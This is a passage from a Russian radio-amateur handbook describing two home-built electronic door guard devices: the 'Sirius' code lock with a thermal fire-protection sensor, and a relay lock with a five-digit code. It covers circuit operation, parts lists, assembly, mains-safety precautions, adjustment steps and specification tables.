В рассматриваемом сторожевом устройстве в качестве термодатчика выбран транзистор типа П416, устойчивая работа которого обеспечивается при температуре от —25 до 125 °С. Транзистор устанавливается снаружи корпуса сторожевого устройства выводами внутрь корпуса и на дюралюминиевой пластине, которая имеет размеры не менее 45х45 мм и толщину до 3 мм. Однако может быть применена и другая конструкция установки и крепления этого транзистора, но во всех случаях термодатчик должен устанавливаться в наиболее пожароопасном месте, а корпус транзистора должен быть всегда открыт.

Изменение тока транзистора VT1 контролируется электронной схемой защиты, в которой предусмотрен разрыв цепи питания сторожевого устройства от сети переменного тока при достижении установленного порогового значения тока транзисторного датчика.

Напряжение переменного тока после замыкания контактов переключателя S1 поступает через цепочку гасящего конденсатора С1 на выпрямитель, собранный на полупроводниковых диодах VD1 и VD2 и далее на сдвоенный стабилизатор напряжения параметрического типа, выполненный на стабилитронах VD4 и VD3, резисторе R1 и конденсаторе С2. Выбранный метод электропитания защитного устройства обеспечивает его устойчивую и надежную работу при минимальном количестве использованных элементов. Подстроечный резистор R3 служит для установления температурного режима срабатывания защиты, который может изменяться в очень широких пределах.

Работает система охраны следующим образом. В тот момент, когда температура окружающей среды и термодатчика достигнет установленного максимума, ток транзистора будет равен пороговому значению. Этот ток при ведет к открыванию транзистора VT2, находящегося в инверсном включении, и через диод VD5 он откроет тиристор VS1. А это в свою очередь приведет к тому, что

обе линии питающей сети переменного тока будут замкнуты между собой через цепочку: предохранитель F2, гасящий десятиваттный резистор R6 сопротивлением 100м и открытый тиристор VS1. Естественно, в этом случае предохранитель F2 мгновенно перегорает и отключает всю систему от сети переменного тока. Заметим, что термодатчик включен в цепь базы управляющего транзистора VT2, а в переход база — эмиттер включен резистор R4, позволяющий регулировать интервал температуры срабатывания устройства. При включении электропитания и подачи напряжения на элементы схемы загорается индикаторная неоновая лампа H1.

Независимо от работы защитного устройства после включения электропитания начинает действовать счетно-решающий блок. Он выполняет одну из функций сторожевого устройства и собран на транзисторах, оптроне, трех ИМС и других ППП. Сначала переменный ток питающей сети поступает на выпрямитель, собранный на четырех диодах по однофазной двухполупериодной мостовой схеме VD6—VD9, а затем сглаживается параметрическим стабилизатором, выполненным на стабилитроне VD10, последовательно с которым включены резисторы R7 и R8. Емкостный фильтр, сглаживающий пульсации постоянного тока, собран на электролитическом конденсаторе СЗ. На выходе стабилизатора действует постоянное стабилизированное напряжение 9 В.

Принцип действия счетно-решающего устройства состоит в следующем. Сначала, в подготовительный период, устанавливается произвольный шифр, состоящий из 9 знаков, расположенных последовательно в произвольном порядке и введенных в память счетно-решающего устройства. На заключительном этапе на дешифраторе, состоящем из двух переключателей S2 и S3, последовательно набираются эти 9 знаков, расположенных в том же порядке. Если весь набор произведен правильно, то после набора последнего знака дается команда на срабатывание ИМ, работающего на постоянном токе. После последнего правильно набранного знака срабатывает тиристор VS1, управляемый оптроном DU1.

В составе счетно-решающего устройства можно выделить в качестве основных самостоятельных функциональных узлов такие, как счетчик-дешифратор, собранный на ИМС DA1; триггеры на ИМС DA2 (выводы 1, 3,4, 5 и 6), ИМС DA3 (выводы 3, 4, 5, 6), ИМС DA3 (выводы 1,2, 8, 9); инвертор; ключевой транзистор VT3; узел задержки времени срабатывания при наборе неправильного знака шифра; узел кодирования и расшифровки кода на двух переключателях S2 и S3 с переключающими группами контактов, не фиксируемые в нажатом положении. девятиразрядный узел кодирования комбинаций цифр. В качестве пояснения к описанию работы системы элементы принципиальной схемы имеют следующие дополнительные обозначения: часть микросхемы DA1 с выводами 3, 4, 5 и б является триггером DAI.1; микросхема DA3 выполняет функцию счетчика-дешифратора; часть микросхемы DA2 с выводами 1, 3—6 является вторым триггером; VT1 — ключевой транзистор; электрическая цепь, состоящая из С1, R5, R6, VD1 и части микросхемы DA1

(DA1.3), является узлом задержки времени.

Набор первоначального шифра сторожевого устройства производится на шифровальной плате, имеющей два ряда контактов, расположенных параллельно друг другу. Один ряд контактов соединен с соответствующими выходами счетчика-дешифратора, а второй ряд — друг с другом и с дешифратором.

Конструктивно этот узел устройства целесообразно разместить на лицевой плате, а в качестве контактов использовать малогабаритные приборные зажимы, рассчитанные на одно соединение, например типа КМЗ-1. Это дает возможность устанавливать любой код в любое время без перепайки контактных групп. На принципиальной схеме (рис. 3.13) контакты платы кодирования условно обозначены цифрами от 1 до 9 и имеют вид А1.1, А1.2...А1.9 и Б1, Б2...Б9. Для получения нужного кода необходимо установить перемычки между параллельно расположенными контактами отрезками монтажного провода в изоляции, имеющей высокое омическое сопротивление. Можно соединять между собой только контакты А1.1 с B1.1; A1.2 с B1.2; A1.3 с B1.3; A1.4 с B1.4; А1.5 c В1.5; В1.6 с А1.6; А1.7 с В1.7; А1.8 с B1.8; A1.9 с В1.9. При этом замкнутые между собой перемычки можно обозначить любой одной цифрой или буквой или математическим знаком.

Если замкнуты все имеющиеся 18 контактов параллельно между собой, то будет составлен, например, код, состоящий из одних и тех же цифр, букв или знаков (1, 1, 1, 1, 1, 1, 1, 1, 1 или А, А, А, А, А, А, А, А, А или +, +, +, +, +, +, +, +, +) Для упрощения схемы

шифрования рекомендуется принять за обозначения незамкнутых контактов цифру 1, а замкнутых — цифру 2. Тогда показанный на принципиальной схеме шифр будет иметь следующий вид: 1, 2, 2, 1, 2, 1, 2, 2, 2.

Для того чтобы набрать этот номер для открывания замка, в устройстве имеются две кнопки S2 и S3. Кнопка S2 при замыкании ее контактов дает команду, соответствующую замкнутым контактам шифровального поля, а конца S3 при замыкании ее контактов — незамкнутым. В этом случае целесообразно на лицевой плате у кнопки

S2 выгравировать цифру 2, а у кнопки переключателя S3 — цифру 1.

Для набора установленного шифра необходимо последовательно нажать кнопки S2 и S3 в следующем порядке:

S3, S2, S2, S3, S2, S3, S2, S2, S2. В этом случае дешифрованное девятое состояние счетчика послужит сигналом включения ИМ. Необходимо запомнить, что наличие перемычки соответствует цифре 2, а ее отсутствие — цифре 1.

При длительной эксплуатации охранного устройства могут возникнуть случаи сбоя при наборе знака, например двойное нажатие от дребезга. Чтобы этого избежать, в схему включен узел защиты, собранный на двух триггерах ИМС ДАЗ (выводы 3—6 и 1, 2, 8, 9), который срабатывает от первого замыкания любых контактов переключателей S2 и S3 и абсолютно не реагирует на остальные замыкания от дребезга.

Основным узлом устройства остается счетчик-дешифратор, собранный на ИМС DA1 и ведущий счет импульсов вводимого шифра от переключателей S2, S3. Сдвоенный триггер, выполненный на ИМС DA2, обеспечивает защиту счетчика от неправильного набора даже одного знака шифра. Если при наборе произошел сбой и была нажата не та кнопка S2 или S3, то сдвоенный триггер не позволяет дальнейший счет. Кроме этого, в сторожевом устройстве собран узел второй самозащиты при неправильном наборе знака шифра, он обеспечивает задержку времени, по истечении которой можно выполнить повторную попытку набора шифра. Время задержки определяется типом диода VD3, значениями сопротивлений резисторов R19 и R20, значением емкости конденсатора С5 и инвертором ИМС DA3. Величину задержки времени можно регулировать в широких пределах — от 2 до 20 с. Это устройство практически запрещает набирать следующий знак до истечения времени задержки. Если набор в это время все же будет выполнен, и даже правильно, результат будет отрицательным, счетчик импульсов не пропустит и ИМ ¦не сработает.

Импульс (сигнал), посланный любой кнопкой S2 или S3, переключает узел дребезга на передачу сигнала на вход датчика счетчика-дешифратора DA1. Если набор знака осуществлен правильно, то на прямом выходе триггера ИМС DA2 (вывод 1) действует низкий уровень логического нуля, разрешающий работу счетчика ИМС DA1 до полного набора шифра.

Если один из набираемых знаков шифра не совпал с установленным на шифровальной плате в .любом разряде счетчика, то на выходе триггера ИМС DA2 (выводы 1, 3—6) появляется высокий уровень логической единицы, который запрещает по существу дальнейший счет. Эта защита будет работать до тех пор, пока устройство не вернется в исходное состояние. Однако, если в это время продолжать нажимать на кнопки S2 или S3, то каждое нажатие будет увеличивать время задержки работы счетчика на величину, которая определяется времязадающей цепочкой R20, С5. После прекращения замыкания контактов переключателей S2 или S3 и по прошествии полученной задержки времени на выходе инвертора ИМС DA3 (выводы 10—13} появляется высокий уровень логической единицы, переключающий триггер ИМС DA2 (выводы 1, 3—6) и счетчик ИМС DA1 в состояние логического нуля, то есть в начальное положение.

Двойная самозащита сторожевого устройства (большое количество возможных сочетаний кодовых знаков в девятиразрядном шифре, невозможность включения ИМ при неправильном наборе и задержка времени срабатывания сторожевого устройства) при попытках подобрать шифр простым перебором знаков обеспечивает ему высокую надежность в работе и отвечает требованиям техники безопасности и охраны имущества.

Если все знаки установленного шифра набраны правильно, то на последнем выходе счетчика ИМС DA1 (вывод 11) появляется высокий уровень логической единицы, который открывает транзистор VT3, что приводит к включению оптрона DU1, а вслед за ним тиристора VS2, включающего электропитание ИМ. В качестве исполнительного устройства в данном случае рекомендуется использовать электромагнит переменного тока промышленного или самодельного изготовления.

Следует заметить, что после правильного набора всех знаков шифра дверь можно открывать только после характерного щелчка механического замка. По истечении времени задержки, определенного электрической цепочкой R.20, C5, сторожевое устройство возвратится в исходное состояние.

При изготовлении электронного сторожевого устройства использованы следующие комплектующие ЭРИ и ЭРЭ: транзисторы VT1 типа П416, VT2 — КТ315Б, VT3 — КТ315Г; оптрон DU1 типа АОУ103Б; выпрямительные диоды VD1 типа Д226Б, VD2 — Д226Б, VD5 — Д226Б, VD6 -VD9 типа КД202Р, VD11 — КД105Б, VD13 -VD21 - КД552A,VD22 — КД522А;

стабилитроны VD3 типа Д814Д, VD4 - Д814А, VD10 — Д814В;

конденсаторы С1 типа К73-17-630В-1 мкФ (два параллельно включенных конденсатора по 0,47 мкФ), С2 — К50-6-25В-100 мкФ, СЗ — К50-6-16В-100 мкФ, С4 — К42У-2-160В-0.1 мкФ, C5 — К50-6-25В-1.5 мкФ; резисторы R1 типа МЛТ-0,25-100 Ом, R2 — МЛТ-0,25-27 кОм, R3 — СПЗ-4Ма-0,25Вт-47 кОм, R4 — МЛТ-0,25-62 кОм, R5 — МЛТ-2-330 кОм, R6 — С5-35В-10Вт-10 Ом (ПЭВ-10Вт), R7 — МЛТ-2-20 кОм, R8 — МЛТ-2-20 кОм, R9 — МЛТ-0,5-2,4 кОм, R10 — МЛТ-0,25-2,2 кОм, R11 — МЛТ-0,25-470 Ом, R12 — МЛТ-0,125-470 Ом, R13 — МЛТ-0,125-100 кОм, R14 — МЛТ-0,25-10 кОм, R15 — МЛТ-0,25-27 кОм, R16 — МЛТ-0,25-1 кОм, R17 — МЛТ-0,25-27 кОм, R18—МЛТ-0,5-82 кОм, R19 — МЛТ-0,125-27 кОм, R20 — МЛТ-0,125-4,7 кОм; электрические соединители X1 типа «вилка», А1.1—А1.9 и В1—В9 типа КМЗ-1 (разъемные зажимные контакты на одно соединение любого типа); предохранители F1, F2 типа ПМ1-0,25А, F3, F4 — ПМ1-0.15 А плавкие; ИМС DA1 типа К176ИЕ8, DA2 — К176ТМ2, D3 — К176ЛА7; тиристоры VS1 типа КУ202К, VS2— КУ202Н; индикаторная лампа H1 типа ТН-02-2; светодиод VD12 типа АЛ307А; электрические соединители X1 типа «вилка», А1, В1 — КМЗ-1 приборные однополюсные; переключатели S1 типа П2К или П1Т-1-1, S2, S3 — КМ1-1.

При изготовлении сторожевого устройства можно применить другие ЭРИ и ЭРЭ, предварительно проверенные на соответствие требованиям ТУ и КД. Резисторы типа МЛТ можно заменить на резисторы типов ОМЛТ, МТ, С1-4, УЛИ, БЛП, С2-8, ВСа; конденсаторы типа К73-17 — на К10У-5, К73-15, К78-2, конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К50-20, можно применить конденсаторы типов К53-4А, К42У-2, МБМ, МБГ; электромагнит постоянного тока Y1 типа ЭМ2-220-1 можно заменить на самодельный электромагнит, переделанный с промышленного типа МИС1100Е; транзистор типа П416 — на ГТ308Б, транзистор типа КТ315Б — на КТ312А, КТ312Б;

выпрямительные диоды типа Д226Б — на любые кремниеные диоды с допустимым обратным напряжением, не менее 100...500 В и прямым током не менее 200 мА; ИМС типа К176ИЕ8 можно заменить двумя ИМС типов К176ИЕ2 и К176ИД1.

Сторожевое устройство собрано в прямоугольном пластмассовом корпусе. Все элементы устройства размещены на печатной плате, изготовленной из одностороннего фольгированного стеклотекстолита толщиной не менее 1,5 мм. Проводники печатной платы могут быть выполнены либо традиционным методом травления, либо их вырезают специальным резаком. Габаритные размеры корпуса устройства не превышают 120Х95Х45 мм. На боковых поверхностях и крышке корпуса размещаются элементы управления, кнопки дешифратора, индикаторные лампы и шифровальное поле в виде двух планок с КМЗ-1.

На крышке и днище корпуса необходимо предусмотреть вентиляционные отверстия, которые располагаются над тепловыделяющими элементами. После изготовления корпус сторожевого устройства необходимо покрыть нитрокраской, цвет которой должен соответствовать интерьеру помещения, так как устройство устанавливается, как правило, рядом с входной дверью.

Монтаж, сборка и особенно подключение и регулировка сторожевого устройства должны осуществляться при обязательном соблюдении правил электробезопасности, так как большинство электрических цепей устройства находятся под высоким напряжением переменного тока питающей сети 220 В, которое опасно для жизни. Это обстоятельство необходимо учитывать при установке сторожевого устройства на место и при ремонте. В схеме отсутствует сетевой понижающий трансформатор питания, а гальваническая развязка осуществляется только оптроном DU1 по низковольтным цепям.

В дополнение к сказанному об установке термодатчика следует заметить, что выбор места его крепления зависит не только от формы охраняемого объекта, но и от конструкции приспособления, к которому крепится транзистор VT1. Можно установить термодатчик в герметичной полиэтиленовой упаковке, что позволит произвести регулировку порога срабатывания охранного устройства, погружая его в горячую воду определенной температуры.

Важным конструктивным элементом системы является ИМ и в данном частном случае стопорное устройство механического замка. Эта система должна позволять хозяину дома открывать охраняемое помещение в случае, когда стопор освобождает механизм замка под воздействием счетно-решающего устройства, в случае, когда есть и когда нет электропитания от сети переменного тока. Такие конструкции не являются новинкой, широко известны и применяются в разных вариантах в изделиях домашних мастеров.

При монтаже комплектующих элементов, и особенно ИМС, ППП, транзисторов, необходимо строго соблюдать правила сборки, технологические приемы и операции, которые обеспечат надежные контактные соединения с минимальными переходными сопротивлениями и качественную эксплуатацию электронного сторожевого устройства. Пайку всех элементов следует осуществлять припоем марки ПОС-40 или ПОС-60 только низковольтным паяльником мощностью не более 25 В при ограниченном времени нагрева контактов, которое не должно превышать 2 с. И обязательно при пайке каждого вывода ППП или ИМС в качестве теплоотвода надо использовать металлический пинцет.

Весь наружный монтаж электрических соединителей производите кабелем, а не монтажным проводом. Кабель должен иметь двойную изоляцию, а ее сопротивление постоянному току должно быть не менее 200 МОм. Печатную плату и мощные транзисторы рекомендуется установить на дюралюминиевом шасси.

Можно в качестве шифра в сторожевом устройстве принять обычно используемый во всех кодовых замках цифровой код от 1 до 9. Тогда несколько усложняется процесс расшифровки, так как изменить номера переключателей S2 и S3 на новые не представляется возможным из-за того, что они не отвечают на вопрос «да — нет».

Регулировка и настройка сторожевого устройства не требует сложных ИП. В данном случае достаточно иметь простой авометр с автономным питанием. Налаживание устройства состоит в подборе сопротивления резисторов и измерении действующих напряжений в контрольных точках и на выходе выпрямительного устройства. Необходимо следить за правильностью установки постоянного напряжения 9 В.

Защитное устройство требует подбора сопротивления резистора R4, и, как было указано ранее, необходимо задать температурные пределы срабатывания защиты. Устройство должно срабатывать при среднем положении движка резистора R3, так как при заданной температуре должен перегорать предохранитель F2.

Порядок данной регулировки следующий.

1. Сначала термодатчик (транзистор VT1) герметически запаивают в полиэтиленовую пленку так, чтобы можно было погружать его в горячую воду, имеющую определенную температуру.

2. Затем обычным термометром измеряют температуру окружающего воздуха в охраняемом помещении.

3. Плавкий предохранитель F2 заменяют лампой накаливания мощностью 150 Вт, рассчитанной на подключение к промышленной сети.

4. Термодатчик помещают в горячую воду с температурой на 5... 15 °С выше той, при которой должна сработать защита, например с температурой 85 °С.

5. Резисторами R3 и R4 через 10 мин после нагревания термодатчика устанавливают порог срабатывания защитного устройства, который определяется моментом загорания лампы накаливания 150 Вт.

6. После этого лампа отключается и вместо нее вновь ставится предохранитель F2.

На следующем этапе регулировки подбираются сопротивления резисторов, включенных в цепь дешифратора R16—R18 (27, 27 и 82 кОм). Сопротивления этих резисторов можно менять в широких пределах.. Если кнопки управления дешифратором S2 и S3 расположены на значительном расстоянии от электронного блока, то рекомендуется монтажные соединения выполнять экранированным проводом.

Основные электрические параметры и технические характеристики универсального электронного сторожевого устройства системы «Сириус»

Номинальное напряжение питающей сети

переменного тока, В..................... 220

Номинальная частота питающей сети

переменного тока, Гц.................... 50

Пределы изменения напряжения питающей сети,

при которых сохраняется работоспособность

устройства, В......................... 180... 235

Пределы изменения частоты питающей сети

переменного тока, Гц................... 49, 5... 50, 5

Коэффициент нелинейных искажений питающей сети

переменного тока, %, не более............. 12

Номинальное напряжение питания автономного

источника постоянного тока, В............. 9

Пределы изменения напряжения постоянного тока

автономного источника, В................ 8... 12

Коэффициент стабилизации выпрямленного

напряжения постоянного тока, не менее...... 80

Амплитуда пульсации выпрямленного напряжения

постоянного тока, мВ, не более............ 8

Пределы изменения температуры окружающей среды,

при которых срабатывает

защитное устройство, °С................. 50... 125

Количество охраняемых объектов при использовании

шифр-замка, шт...................... 1

Количество объектов, охраняемых температурными

датчиками, шт....................... 1... 15

Количество элементов типа 373, входящих

в автономный источник электропитания, шт.... 6

Вероятность подбора шифра сторожевого устройства

при незнании кода, не более.............. 0, 1^-4

Количество возможных комбинаций

при установлении шифра, шт .............. Зх105

Количество разрядов кодовой комбинации, шт . . . . 9

Вероятность безотказной работы устройства

при риске заказчика в=0,95, не менее ....... 0,98

Срок службы, ч, не менее ................. 5000

Включение датчиков температуры ............ параллельное

Сопротивление шлейфа, кОм, не более ......... 5

Задержка времени срабатывания счетчика

после неправильного набора очередного

шифра, с ........................... 1...20

Ток, потребляемый устройством в режиме

холостого хода, мА, не более .............. 6

Мощность, потребляемая устройством при работе

счетчика и при срабатывании ИМ, Вт,

не более ........................... 50

Мощность электромагнита, Вт, не более ........ 30

Сопротивление изоляции токоведущих частей

устройства, МОм, не менее ............... 10

Помехозащищенность устройства при воздействии

внешнего электромагнитного поля, дБ,

не менее ........................... 100

Условия эксплуатации:

температура окружающей среды, °С ....... —20...+40

относительная влажность воздуха при температуре 22 °С, %, не более ................... 90±3

атмосферное давление воздуха, мм рт. ст. ..... 200...900

t61.jpg

Рис. 3.13. Принципиальная схема универсального электронного сторожевого устройства системы «Сириус».

 

Рис. 3.13. Принципиальная схема универсального электронного сторожевого устройства системы «Сириус».

Изображение: 

3. 8. Релейное сторожевое устройство с пятизначным шифром

3.8. РЕЛЕЙНОЕ СТОРОЖЕВОЕ УСТРОЙСТВО С ПЯТИЗНАЧНЫМ ШИФРОМ

Электромеханическое сторожевое устройство относится к числу наиболее простых релейных полуавтоматов, изготовление которых в условиях радиолюбительской лаборатории не представляет больших затруднений. При этом домашний мастер при изготовлении данного устройства может много экспериментировать, совершенствовать не только электрическую схему, но и конструктивное исполнение, вносить в нее необходимые изменения и дополнения. Сама принципиальная электрическая схема является примером классического исполнения таких устройств, она дает возможность радиолюбителю проверить большинство технологических приемов сборки и монтажа и выполнить регулировку и настройку самыми простыми ИП и инструментами.

Такие релейные устройства устанавливаются на входных дверях городских домов и подъездов, выполняются в различных вариантах конструктивных и электротехнических решений. Настоящее сторожевое устройство характеризуется достаточно высокими эксплуатационными характеристиками, надежностью, долговечностью и простотой электрического монтажа. Разработано сторожевое устройство для работы в жестких условиях механических и климатических нагрузок в УХЛ, ХЛ, В как внутри охраняемых помещений, так и на открытых площадках. Устройство устойчиво работает при температуре окружающей среды от —30 до 45 °С, при повышенной относительной влажности воздуха до 92% при температуре 25 °С и при пониженном атмосферном давлении до 5 мм рт. ст.

Работает сторожевое устройство от сети переменного тока напряжением 220 В частотой 50 Гц или от автономного источника питания постоянного тока напряжением 24 В, который подключается к разъемным зажимным контактам А и Б.

Принципиальная электрическая схема релейного сторожевого устройства приведена на рис. 3. 14. Она включает в свой состав входные цепи с сигнальными устройствами, сетевой понижающий трансформатор питания Т1, выпрямительное устройство, работающее на емкостный фильтр, и собственно релейный автомат.

Подключается устройство к сети питания с помощью электрического соединителя X1 типа «вилка» и

3-81.jpg

Рис. 3. 14. Принципиальная схема релейного сторожевого устройства с пятизначным шифром.

стандартной штепсельной розетки. Плавкие предохранители F1 и F2, установленные на входе электрической цепи, предназначены для защиты устройства от коротких замыканий и перегрузок, которые очень часто возникают из-за неправильного монтажа, ошибок, допускаемых начинающими радиолюбителями, а также из-за неисправных комплектующих ЭРЭ. Включение и выключение электропитания устройства производится однополюсным переключателем S1, который должен быть установлен на лицевой панели корпуса сторожевого устройства, и, как правило, рядом с индикаторной лампой тлеющего разряда H1. Здесь же, на лицевой панели корпуса устройства, устанавливаются держатели предохранителей F1 и F2.

К контактным соединителям Х2 и ХЗ подключается электрический звонок BA1, работающий от сети переменного тока напряжением 220 В и включаемый в действие контактами К5. 2 электромагнитного реле К5.

Сетевой понижающий трансформатор питания Т1 унифицированной конструкции позволяет обеспечить необходимую электробезопасность при эксплуатации, регулировке и ремонте сторожевого устройства, так как на выходе трансформатора действуют низкое переменное напряжение и небольшие токи нагрузки, не опасные для жизни человека. Сетевой трансформатор питания обесчивает также заданное выходное напряжение постоянного тока на выпрямителе и полную гальваническую развязку вторичных цепей релейного автомата и цепей управления от высокого напряжения питающей сети переменного тока.

Выпрямительное устройство собрано по однофазной двухполупериодной мостовой схеме на четырех выпрями тельных диодах малой мощности VD1,VD4 и оксидном конденсаторе С1, который выполняет роль емкостного фильтра, сглаживающего пульсации выпрямленного напряжения постоянного тока и обеспечивающего минимальную пульсацию. Выпрямитель мостового типа характеризуется пониженным значением обратного напряжения на выпрямительных диодах, высоким коэффициентом использования габаритной мощности сетевого трансформатора питания Т1, повышенным уровнем пульсации на выходе выпрямителя по сравнению с другими видами схем выпрямителей малой мощности. Одновременно выпрямитель на четырех диодах имеет некоторые недостатки, например, повышенные потери мощности, пониженный кпд, повышенную стоимость изготовления, невозможность установки диодов на радиаторе охлаждения без изоляционных прокладок, сложную технологию изготовления.

Релейный автомат имеет очень простую схему соединений, включения и работы комплектующих ЭРИ и ЭРЭ, но отличается высокой степенью надежности и долговечности при эксплуатации, а его сборка под силу начинающему радиолюбителю и юным техникам.

При изготовлении сторожевого устройства использованы следующие комплектующие ЭРИ и ЭРЭ: сетевой понижающим трансформатор питания Т1 типа ТН34-127/220-50; электромагнитные реле К1—К5 типа РЭС-9 (например, паспорт РС4.529.029-03); выпрямительные диоды VD1—VD4 типа Д237А; конденсатор С1 типа К50-6-50В-100 мкФ; резистор R1 типа МЛТ-2-470 кОм; индикаторная лампа H1 типа ТН-03; звонок электрический бытовой BA1 с напряжением питания 220 В любой конструкции и типа; предохранители плавкие F1, F2 типа ИМ 1-0, 5 А; переключатели S1 типа П1Т-1 1, S2 — П2К; электрические соединители X1 типа, «вилка» Х2—Х19 —"штырь". и «гнездо» приборные покупные или самодельной конструкции, S3—S11 — КМ1-1; A,Б ,В1 и В2— разъемные соединения самодельной конструкции.

Исполнительным механизмом сторожевого устройства является электромагнит промышленного изготовления или втяжной соленоид типа КМ1, которые устанавливаются непосредственно на входной двери и соединяются специальной тягой с защелкой механического замка. В устройстве может быть применен самодельный соленоид, работающий от сети переменною тока и включаеый параллельно звонку ВА1 вместе с последовательно соединенными контактами реле К4.2. Конструкция такою соленоида состоит из сердечника, катушки с обмоточным проводом, корпуса и деталей соединения соленоида с замком. Сердечник соленоида изготавливается из электротехнической стали или мягкого железа, имеет диаметр основного стержня 29 мм и длину до 100 мм. Если сердечник соленоида изготавливается не круглого, а прямоугольного сечения, то и катушка соленоида должна иметь прямоугольное отверстие с размерами 20Х20 мм. На конце сердечника нарезана резьба М12 длиной 18...20 мм. Катушка соленоида состоит из каркаса длиной 80...85 мм и обмоточного провода марки ПЭВ-2 диаметром 0,31 мм. Внутренние размеры катушки, куда входит сердечник, равны диаметру 20,5 мм или квадрату с размерами 20,5Х20,5 мм. После намотки наружный диаметр катушки составит ориентировочно 30 мм при толщине стенок каркаса до 1,5 мм. Число витков, рассчитанных на напряжение 220 В, равно 5400, и на каждый виток действует напряжение 0,04 В.

Соленоид вместе с пружинным механическим замком устанавливается на дверь, закрепляется винтами по разметке после проверки хода ригеля и надежного запирания двери. Для соединения соленоида с пружинным механизмом производится соответствующая доработка замка. Для увеличения тяговой силы соленоида необходимо с другого конца отверстия катушки закрепить дополнительный сердечник из электротехнической стали длиной 15...20 мм.

Электрический переключатель S2 является блокировочным и устанавливается также на входной двери. Его

контакты размыкаются при открывании двери и вновь замыкаются при закрывании. Это соответствует тому, что при открывании дверей все обмотки реле К1—К4 обесточиваются и их контакты возвращаются в исходное положение, подготавливая релейный автомат к следующему набору шифра и приходу нового посетителя, знающего этот шифр.

Соединение контактов блокировочного переключателя и подключение соленоида к источникам электропитания производятся высокопрочным кабелем с двойной изоляцией, который прокладывается по косяку двери и стене к пульту управления и кнопкам дешифратора.

Работает релейное сторожевое устройство следующим образом. После включения сторожевого устройства в сеть переменного тока или к постоянному источнику питания и замыкания контактов переключателя S1 напряжение сразу же подается на сетевой трансформатор питания Т1 и выпрямительное устройство, подготавливая его к эксплуатации, если перед этим был установлен соответствующий шифр. Как следует из приведенной на рис.3.13 принципиальной схемы, кодирующие вставки соединителей замыкают контакты А2—Х4, A3—Х6, А4—Х8, А7— X14, таким образом набирается шифр из пяти цифр 2, 3, 4, 6 и 7. В оставшиеся гнезда вставлены вилки Х2, Х10, Х16, Х18, соединенные с обмоткой реле К5.

Дешифровка кода и открывание двери могут производиться только в строго указанной последовательности:

сначала необходимо нажать кнопку переключателя S4, соответствующую первой цифре шифра 2, затем S5, S6, S8 и S9. Любое нажатие кнопок в другой последовательности к положительному результату не приводит, а если будут нажаты кнопки не из установленного шифра, то всегда произойдет общий сброс и устройство возвратится в исходное состояние. Например, если после правильного набора нескольких первых цифр, при которых срабатывают последовательно реле K1, К2, КЗ, будет нажата кнопка переключателя S3, то питание будет подано на электромагнитное реле К5, которое сработает и своими контактами K5.1 разомкнет питание реле К1, и произойдет общий сброс всех правильно набранных первых цифр шифра.

При правильном наборе шифра, когда нет ошибок, происходят следующие переключения. После нажатия на кнопку переключателя S4, соответствующую цифре 2 сработает реле К1, подготавливая устройство защиты к набору второй цифры шифра, так как будут замкнуты контакты К1.1, блокирующие электропитание реле К1, и одновременно будут замкнуты контакты К1.2, подготавливающие подачу питания на реле К2 и т.д. После нажатия на кнопку S5, соответствующую второй цифре шифра 3, питание с выпрямителя будет подано на обмотку реле К2 через цепочку S5, Х7, Х6, A3, К1.2 на К2. После срабатывания К2 контакты К2.2 подготавливают эту цепочку к подаче напряжения на реле КЗ и набору следующей цифры шифра. Контакты К2.1 самоблокируют подачу питания на реле К2. После нажатия на кнопку переключателя S6, соответствующую третьей цифре правильного кода, питание подается на обмотку реле КЗ, оно срабатывает, замыкая свои контакты КЗ.1 и КЗ.2. При этом замкнутые контакты К.3.1 самоблокируют питание реле КЗ, а контакты КЗ.2 подготавливают устройство к подаче напряжения питания на обмотку реле К4.

Теперь, правильно набирая предпоследнюю цифру шифра 6, необходимо нажать на кнопку переключателя S8 и подать напряжение питания на реле К4 по электрической цепи S8, Х13, Х12, А6, КЗ.2, обмотка реле К4, K5.1, S2. Реле К4, срабатывая, замыкает свои контакты К4.1 и К4.2. Контакты К4.1 самоблокируют питание реле после отпускания кнопки переключателя S8. Контакты К4.2 замыкают цепь питания электромагнита КМ1 или соленоида, подготавливая его к срабатыванию. После нажатия на кнопку переключателя S9 электропитание подается на электромагнит КМ1, который, срабатывая, открывает замок на входной двери.

Необходимо отметить, что при нажатии на любые кнопки переключателей S3, S7, S10 и S11 напряжение электропитания подается на обмотку реле К5, которое замыкает контакты К5.2 и размыкает контакты K5.1. При замыкании контактов электропитание сети переменного тока подается на электрический звонок, который будет работать в течение времени нажатия на указанные замыкающие кнопки. В некоторых случаях, для большей скрытности кодирования, цепь звонка исключают из схемы. Контакты К5.1 в разомкнутом состоянии обесточивают питание всех обмоток реле К1—К4, которые не позволяют сработать всей системе.

При правильной сборке и монтаже из заведомо исправных ЭРЭ релейное устройство в настройке не нуждается. Оно начинает работать сразу же после включения в сеть.

Вместо покупного унифицированного трансформатора питания в устройстве можно применить самодельный трансформатор, не уступающий по своим техническим характеристикам трансформатору типа ТН, но при условии правильного выполнения всех операций изготовления и соблюдения передовой технологии. Большинство основных технологических приемов не требуют значительной подготовительной работы. Основные из этих приемов изложены в предыдущих главах справочника, отступления от которых приводят к нежелательным последствиям. Моточные данные сетевого понижающего трансформатора питания Т1 самодельной конструкции с уменьшенным числом обмоток приведены в табл. 3.13.

Таблица 3.13. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в релейном сторожевом устройстве с пятизначным шифром

3-82.jpg

Основные электрические параметры

и технические характеристики

релейного сторожевого устройства с пятизначным шифром

Номинальное напряжение питающей сети

переменного тока, В .................... 220

Номинальная частота питающей сети

переменного тока, Гц .................... 50

Коэффициент нелинейных искажении питающей сети переменного тока, %, не более.............. 10

Номинальное напряжение питающего автономного

источника постоянного тока, В.............. 24

Пределы изменения напряжения питающей сети переменного тока, В..................... 187... 245

Пределы изменения частоты питающей сети

переменного тока, Гц.................... 49... 51

Пределы изменения напряжения постоянного тока

автономного источника питания, В........... 20... 25

Напряжения на выводах обмоток сетевого унифицированного трансформатора питания. В:

1 и 2; 4 и 5 ......................... 110

7 и 8; 9 и 10 ........................ 6,3

11 и 12; 11 и 15 ......................5

11 и 13; 14 и 16 ..................... .6,3

Напряжение питания реле постоянного тока, В .... 24

Время готовности сторожевого устройства после включения напряжения питания, с, не более ..... 0,2

Время срабатывания устройства после набора одной цифры шифра, с, не более ............ 0,1

Количество одновременно охраняемых объектов, шт . 1 Максимальное количество цифр шифра, шт ..... .9

Количество вариантов набора шифра, шт ........ 362 880

Сопротивление изоляции токоведущих проводников и частей устройства относительно металлического корпуса и между собой, МОм, не менее ........ 20

